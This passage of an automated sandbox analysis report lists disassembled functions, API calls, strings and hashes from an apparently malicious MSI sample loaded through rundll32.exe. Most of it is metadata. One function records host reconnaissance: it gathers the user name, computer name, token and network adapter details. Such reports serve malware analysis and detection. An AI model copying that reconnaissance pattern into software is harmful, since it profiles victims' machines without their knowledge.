APIs

__EH_prolog3_GS.LIBCMT ref: 00C2D7A5
_swprintf.LIBCMT ref: 00C2D817

Part of subcall function 00C18610: std::_Lockit::_Lockit.LIBCPMT ref: 00C18657
Part of subcall function 00C18610: std::_Lockit::_Lockit.LIBCPMT ref: 00C18679
Part of subcall function 00C18610: std::_Lockit::~_Lockit.LIBCPMT ref: 00C186A1
Part of subcall function 00C18610: std::_Lockit::~_Lockit.LIBCPMT ref: 00C1880E

Strings

%.0Lf, xrefs: 00C2D80F

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
String ID: %.0Lf
API String ID: 1487807907-1402515088
Opcode ID: 3b4893b1d37fb4e68b649f43cde7d2c3c9cae654095fb619366ffec3096ff644
Instruction ID: 6edd82629558847720d490d48cc7ea26b286d069c376414b5b28ffd14c687df5
Opcode Fuzzy Hash: 3b4893b1d37fb4e68b649f43cde7d2c3c9cae654095fb619366ffec3096ff644
Instruction Fuzzy Hash: A0417875E00318ABCF05EFE0D845ADE7BB5FF18300F208459E846AB295EB35995ADF90

Function 00C31887 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00C3188E
_swprintf.LIBCMT ref: 00C31900

Part of subcall function 00C19270: std::_Lockit::_Lockit.LIBCPMT ref: 00C192A0
Part of subcall function 00C19270: std::_Lockit::_Lockit.LIBCPMT ref: 00C192C2
Part of subcall function 00C19270: std::_Lockit::~_Lockit.LIBCPMT ref: 00C192EA
Part of subcall function 00C19270: std::_Lockit::~_Lockit.LIBCPMT ref: 00C19422

Strings

%.0Lf, xrefs: 00C318F8

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
String ID: %.0Lf
API String ID: 1487807907-1402515088
Opcode ID: 3f8ac71c8ef5874f6f5eb69f75d06846a8a53e3018434922f0319551c7279a0c
Instruction ID: 6ea88137b2c9fc7e068843dd1d1d9267ecf1c336b4d94ece3a71ad587c888cb4
Opcode Fuzzy Hash: 3f8ac71c8ef5874f6f5eb69f75d06846a8a53e3018434922f0319551c7279a0c
Instruction Fuzzy Hash: 4A416771E10308ABCF05DFE0D855ADDBBB5FF08300F208449E806AB291DB359A5AEF94

Function 00C36059 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00C3607E

Strings

MOC, xrefs: 00C36090
RCC, xrefs: 00C36098

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: e1d5ca98544e2f4b41bff4522c68dce08f242f7e9be7bbd5891d35ea11306dd3
Instruction ID: 46bb1aad6d6ac1be022813bd1e17e21a39c0dfc5991a7e333e2d5a762c763fb8
Opcode Fuzzy Hash: e1d5ca98544e2f4b41bff4522c68dce08f242f7e9be7bbd5891d35ea11306dd3
Instruction Fuzzy Hash: 31414871910209FFCF15DF98CC81AEEBBB5BF48304F188159F918A7252D3359A51EB50

Function 00C2DF8F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00C2DF96
__cftoe.LIBCMT ref: 00C2E01A

Strings

!%x, xrefs: 00C2DFA7

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: H_prolog3___cftoe
String ID: !%x
API String ID: 855520168-1893981228
Opcode ID: 0ad18650f33895e4c11020de4d7734f32c2d95d23efc98e91a12fe54e9471fba
Instruction ID: 07b5e4ec9b5930419e687430892d05eca275ce3efd0abf03e98a8e8d0bad8335
Opcode Fuzzy Hash: 0ad18650f33895e4c11020de4d7734f32c2d95d23efc98e91a12fe54e9471fba
Instruction Fuzzy Hash: 95318671D10219EBDF04EF94E981AEEB7B6FF08304F204419F805B7251DB75AA46DB64

Function 00C319FA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00C31A01
__cftoe.LIBCMT ref: 00C31A7F

Strings

!%x, xrefs: 00C31A15

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: H_prolog3___cftoe
String ID: !%x
API String ID: 855520168-1893981228
Opcode ID: d533849f86361a5c7c9acad92f4487e7dc5a5a4e8d53f88f28c40391ede00950
Instruction ID: e3ae5895dca8cdb6405cec7c7f15820451568db8c52a3b285d39e69ad6b94ec9
Opcode Fuzzy Hash: d533849f86361a5c7c9acad92f4487e7dc5a5a4e8d53f88f28c40391ede00950
Instruction Fuzzy Hash: 43318C72D25258AFDF00DF98E881BEEBBB5EF09301F144019F844B7242D7759A46EBA0

Function 00C15F40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

ConvertSidToStringSidW.ADVAPI32(?,00000000), ref: 00C15F86
LocalFree.KERNEL32(00000000,Invalid SID,0000000B,?,00000000,0EAD22C0), ref: 00C15FF6

Strings

Invalid SID, xrefs: 00C15FD4

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: ConvertFreeLocalString
String ID: Invalid SID
API String ID: 3201929900-130637731
Opcode ID: cb2f81f93c86b4ec93847eb89af297034a933b0922d1c318bc6998eeeb930dd2
Instruction ID: 94a9e390b7e448988c6d7758008f7f0fea34a3667602ed9a36904a048e80d781
Opcode Fuzzy Hash: cb2f81f93c86b4ec93847eb89af297034a933b0922d1c318bc6998eeeb930dd2
Instruction Fuzzy Hash: 31218E75A04605DBDB14CF98C855BAFBBF8EB45714F10061DE411A7280D7B96A858BD0

Function 00C19070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00C1909B
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00C190FE

Strings

bad locale name, xrefs: 00C19121

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 3988782225-1405518554
Opcode ID: b7946926c9017a4e296599ae3d31493e5973727abf8ced48318689071ae6dcf9
Instruction ID: 7743d8454fb688c50f19d2bb19318762f9b17b50bdb16c88bd1846b57cb416dc
Opcode Fuzzy Hash: b7946926c9017a4e296599ae3d31493e5973727abf8ced48318689071ae6dcf9
Instruction Fuzzy Hash: 4B21C070805B84EED721CFA8C90478BBFF4EF19714F10869EE49597B81D3B5A604CBA1

Function 00C1F098 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00C1F09F

Strings

false, xrefs: 00C1F0F6
true, xrefs: 00C1F109

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: H_prolog3_
String ID: false$true
API String ID: 2427045233-2658103896
Opcode ID: 82891d444c86ac11498a66232e00f7cb4ef503506c4c2a01160531c16b3f3c81
Instruction ID: 309497503b603a3c8c30de8840aedc8c46bec203d1db3000b04fa745af498d0f
Opcode Fuzzy Hash: 82891d444c86ac11498a66232e00f7cb4ef503506c4c2a01160531c16b3f3c81
Instruction Fuzzy Hash: F3119375D41744EEC720EFB4D481BCAB7F4AF09300F14C52AF4A297642EA70E645EB50

Function 00C14070 Relevance: 5.2, APIs: 4, Instructions: 189memoryCOMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000,00C14261,00C54400,000000FF,0EAD22C0,00000000,?,00000000,?,?,?,00C54400,000000FF,?,00C13A75,?), ref: 00C14096
LocalAlloc.KERNEL32(00000040,40000022,0EAD22C0,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00C14154
LocalAlloc.KERNEL32(00000040,3FFFFFFF,0EAD22C0,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00C14177
LocalFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00C14217

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: Local$AllocFree
String ID:
API String ID: 2012307162-0
Opcode ID: fd57f7e96f5622203aa97ca6ac815e6d820c2f244bd9fdf50e2c7949f3cb0dc5
Instruction ID: 88c16c9e618e5caf896f6f34be6994e950b98c0cb89456bb4543415838f678a1
Opcode Fuzzy Hash: fd57f7e96f5622203aa97ca6ac815e6d820c2f244bd9fdf50e2c7949f3cb0dc5
Instruction Fuzzy Hash: 8751A2B5A002059FDB1CDF68C985AAEBBB5FB49350F24462DE925E7280D730AEC0DB50

Function 00C11D80 Relevance: 5.2, APIs: 4, Instructions: 171memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,80000022,00000000,?,00000000), ref: 00C11E01
LocalAlloc.KERNEL32(00000040,7FFFFFFF,00000000,?,00000000), ref: 00C11E21
LocalFree.KERNEL32(7FFFFFFE,?,00000000), ref: 00C11EA7
LocalFree.KERNEL32(00000001,0EAD22C0,00000000,00000000,00C53C40,000000FF,?,00000000), ref: 00C11F2D

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: Local$AllocFree
String ID:
API String ID: 2012307162-0
Opcode ID: 510a634561b2a341193528157c3719d0158c741fd82736916578890385d6e6c9
Instruction ID: a3fc60f6dbbfc8fc1264d8561b3b4528a99b9078419d3d9d296f2fc0d952c0b6
Opcode Fuzzy Hash: 510a634561b2a341193528157c3719d0158c741fd82736916578890385d6e6c9
Instruction Fuzzy Hash: 275114725082119FC715DF68D844AAEB7E8FF4A310F140B6EFD66D7290DB34E9809791

Analysis Process: rundll32.exePID: 7664, Parent PID: 7640COMMON

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	86.9%
Signature Coverage:	7.2%
Total number of Nodes:	1103
Total number of Limit Nodes:	54

Executed Functions

Function 0000023CDA4A4D00 Relevance: 10.8, APIs: 7, Instructions: 282
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserNameW.ADVAPI32 ref: 0000023CDA4A4D92
GetComputerNameExW.KERNEL32 ref: 0000023CDA4A4DA7
GetComputerNameExW.KERNEL32 ref: 0000023CDA4A4DD6
GetTokenInformation.KERNELBASE ref: 0000023CDA4A4E12
GetNativeSystemInfo.KERNEL32 ref: 0000023CDA4A4EC4
GetAdaptersInfo.IPHLPAPI ref: 0000023CDA4A4FB0
GetAdaptersInfo.IPHLPAPI ref: 0000023CDA4A4FF5

Memory Dump Source

Source File: 00000005.00000002.4125510573.0000023CDA481000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000023CDA481000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23cda481000_rundll32.jbxd

Similarity

API ID: InfoName$AdaptersComputer$InformationNativeSystemTokenUser
String ID:
API String ID: 1596153048-0
Opcode ID: 734901508a68811e876b4a3c5d65e8c7476ff381839600de737bf5e9afc0d482
Instruction ID: 90f8a53efa42a12b59c4308e1f5593c58cd6803fa7b7a89b115b7258fd6fec5b
Opcode Fuzzy Hash: 734901508a68811e876b4a3c5d65e8c7476ff381839600de737bf5e9afc0d482
Instruction Fuzzy Hash: 5DA1E334218B088FEB54AB14D89A7DAB7E5FB94304F50453DB84AD3291DB7CEA45CB82

Function 00007DF4877C0100 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

@, xrefs: 00007DF4877C0237

Memory Dump Source

Source File: 00000005.00000003.2065466444.00007DF4877C0000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF4877C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_7df4877c0000_rundll32.jbxd

Similarity

API ID: CreateSnapshotToolhelp32
String ID: @
API String ID: 3332741929-2766056989
Opcode ID: 4dd753c87e2aa29c9c96ae48a87dd40f0169a1ec6aa8ae238ef9ae283b3ca07b
Instruction ID: b61a47613cb2cbf8d44eeb24662b80ca4362c224c2c3f3b452d5b240c9d5e6ef
Opcode Fuzzy Hash: 4dd753c87e2aa29c9c96ae48a87dd40f0169a1ec6aa8ae238ef9ae283b3ca07b
Instruction Fuzzy Hash: C271E031614A4C8FEF94EF5CD858BA937E1FB98315F10422AE81EC72A0DB74A954DB80

Function 0000023CDA481600 Relevance: 1.7, APIs: 1, Instructions: 169
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExitUserThread.NTDLL ref: 0000023CDA481794

Memory Dump Source

Source File: 00000005.00000002.4125510573.0000023CDA481000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000023CDA481000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23cda481000_rundll32.jbxd

Similarity

API ID: ExitThreadUser
String ID:
API String ID: 3424019298-0
Opcode ID: c7cfbd4c28cfd34a067c4dec962a0dff76d3cfd4b019f48227f7b9b53671fbdc
Instruction ID: b37cbb4b3c7f81b8092bc181047909bc102d0b63e250bbbdf9ef01a40d2d7a7f
Opcode Fuzzy Hash: c7cfbd4c28cfd34a067c4dec962a0dff76d3cfd4b019f48227f7b9b53671fbdc
Instruction Fuzzy Hash: DF51B378118A0C4FE748EF28E8597B5B7E1FB56311F20126DF49AD32E2CA38E9028755

Function 0000023CDA48CCE0 Relevance: 1.6, APIs: 1, Instructions: 114
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrGetProcedureAddress.NTDLL ref: 0000023CDA48CDB2

Memory Dump Source

Source File: 00000005.00000002.4125510573.0000023CDA481000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000023CDA481000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23cda481000_rundll32.jbxd

Similarity

API ID: AddressProcedure
String ID:
API String ID: 3653107232-0
Opcode ID: 64a4c363e66e8fcb324c2d013a85a570e217f1f41a485886b1e3891cf8e103dc
Instruction ID: ddc14b91d27e85c63cf74956c1196782f526ef772b193791fcbdfef40c4180b0
Opcode Fuzzy Hash: 64a4c363e66e8fcb324c2d013a85a570e217f1f41a485886b1e3891cf8e103dc
Instruction Fuzzy Hash: BE31D535118B0C4BD768AF18DC4A7BAF7E0FB85310F60162EF586D3252D634A95687C7

Function 00007FFDFA8A9A80 Relevance: 1.5, APIs: 1, Instructions: 13
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNEL32 ref: 00007FFDFA8A9A98

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 3b9193fbf2ab34594eed76214b4d4e304845222aad74228beea63719356c42be
Instruction ID: c97c2ce9e0556d8e27b5a948a9328874fe750f9e2029a8bf14e1f2ca9afb6e86
Opcode Fuzzy Hash: 3b9193fbf2ab34594eed76214b4d4e304845222aad74228beea63719356c42be
Instruction Fuzzy Hash: 7AE0EC36B18A8286EB54DB10E86246AB3A0FB88744FD00072EA9D82769DE7CE1058B00

Function 0000023CDA4817B0 Relevance: .4, Instructions: 355COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4125510573.0000023CDA481000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000023CDA481000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23cda481000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6edcd4019d0df1e3a7a77f74f8dfd7206db6cfb27f4870b6333d9231904050ff
Instruction ID: ff6a06910fa6aa4f85397cbfb43bfb15c34f8b1e943b5313909c664e8b1617f2
Opcode Fuzzy Hash: 6edcd4019d0df1e3a7a77f74f8dfd7206db6cfb27f4870b6333d9231904050ff
Instruction Fuzzy Hash: 39C1F138118A4D8FEB58EF28D8997E9B7E1FB55300F60116AF48AD32D2DB789A41C741

Function 0000023CDA4871B0 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4125510573.0000023CDA481000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000023CDA481000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23cda481000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62d6cbcc5dfeb1084a9cc122a67364a682b6f2504e530092aaea3ef2afdda240
Instruction ID: 22bd4464f4c9dc3dd564ce844c5a2dab4a2e67fcf3e014053ef10d25709276fd
Opcode Fuzzy Hash: 62d6cbcc5dfeb1084a9cc122a67364a682b6f2504e530092aaea3ef2afdda240
Instruction Fuzzy Hash: F7419374128A088FF348DF28E8597AAB7E1FB48304F60566DF45AD32D2CB7C9945CB81

Function 0000023CDA4B4360 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4125510573.0000023CDA481000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000023CDA481000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23cda481000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 246b04183441d9db0d4c236240df2ca26f18e78107733016fa740d2a375581b5
Instruction ID: 45143e93a9f87b009bdf9ddb0bba01b8701dd6836a66bc7132efac0ba0a6932a
Opcode Fuzzy Hash: 246b04183441d9db0d4c236240df2ca26f18e78107733016fa740d2a375581b5
Instruction Fuzzy Hash: BE412C7151CB488FE6789F08A8467EAB7E0FB99720F10492FE5C982251D735A5528BC2

Function 0000023CDA4B3F40 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4125510573.0000023CDA481000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000023CDA481000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23cda481000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38f81910f3a60e41c97a405c41efcb50c28e990bd7599c8c7593531c701bee66
Instruction ID: b3953c828a8b1cc08769e765da908920240e20a36b9737e0f6ca80c6f796f1d6
Opcode Fuzzy Hash: 38f81910f3a60e41c97a405c41efcb50c28e990bd7599c8c7593531c701bee66
Instruction Fuzzy Hash: 8611A23061DB488FE758DB19A85A7B6B7E0FB99721F10591FF488C2650D679A4808783

Function 0000023CDA4B4BE0 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4125510573.0000023CDA481000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000023CDA481000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23cda481000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4459b4d784854b5074084b1eb2e58009c50c2c7bf0fd286647bf740f6eacac18
Instruction ID: ec05940cd210563e3d99a4233dc8c094841b5eac8a7d27608c64a2adff2bc638
Opcode Fuzzy Hash: 4459b4d784854b5074084b1eb2e58009c50c2c7bf0fd286647bf740f6eacac18
Instruction Fuzzy Hash: E011C430658B4D8FEB54EF58984B779B3E4F749715F50082EF489C2290D779D9808B83

Function 0000023CDA497A50 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4125510573.0000023CDA481000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000023CDA481000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23cda481000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1edcd44484da87e5859a06b6baea96ffdedb9e447a7428d438afc54a8ed0a131
Instruction ID: 82633de93bbd6ef7edb6568748f8a5702d35e1ee6a9b2e568b8d9fbeff339d6b
Opcode Fuzzy Hash: 1edcd44484da87e5859a06b6baea96ffdedb9e447a7428d438afc54a8ed0a131
Instruction Fuzzy Hash: 8C110170118B4C4FF7648A18844B3BAB7C0F7C8314F64452DF889922C1DBF99758874B

Function 0000023CDA4B4FF0 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4125510573.0000023CDA481000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000023CDA481000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23cda481000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3b493b046dda1831e3ac93b31f1d57d2ffdedc147415695421c0937c946fff3
Instruction ID: 7d23a50b353da381b252a6ca2caba5e18c263cc3869dd23d67e75a79ffd62e34
Opcode Fuzzy Hash: a3b493b046dda1831e3ac93b31f1d57d2ffdedc147415695421c0937c946fff3
Instruction Fuzzy Hash: 2211A734618B498FEB189F18984BBBAB7E0F759711F50082EF449D2290D779D540CBC3

Function 0000023CDA4B4740 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4125510573.0000023CDA481000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000023CDA481000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23cda481000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6c2dce99591ed636752d02e92fb4e83679b8b4534c19c070d62bd12e62a70ad
Instruction ID: fd9fdc8031f230f096fd925a43c3958031f71599176e822c599a0e89c873a1f8
Opcode Fuzzy Hash: c6c2dce99591ed636752d02e92fb4e83679b8b4534c19c070d62bd12e62a70ad
Instruction Fuzzy Hash: E4019634628B498FF748AB18940B7B677E1F789710F20592EF449D3691D639DA418BC3

Function 0000023CDA68D2B6 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000003.1704863145.0000023CDA650000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023CDA650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_23cda650000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f8c2193cd15d56b920b71f0a62798233d7bc621eaf68b72cfb2e802f18a24de
Instruction ID: 61713e40aa2a8e310652a5f17d449f8735d5679e4c8db938089a0f5a5d966f85
Opcode Fuzzy Hash: 4f8c2193cd15d56b920b71f0a62798233d7bc621eaf68b72cfb2e802f18a24de
Instruction Fuzzy Hash: D0F0A470618B448BE758DF2884C9635B7E1FBD8755F24452EF989C7361CB35A842CB43

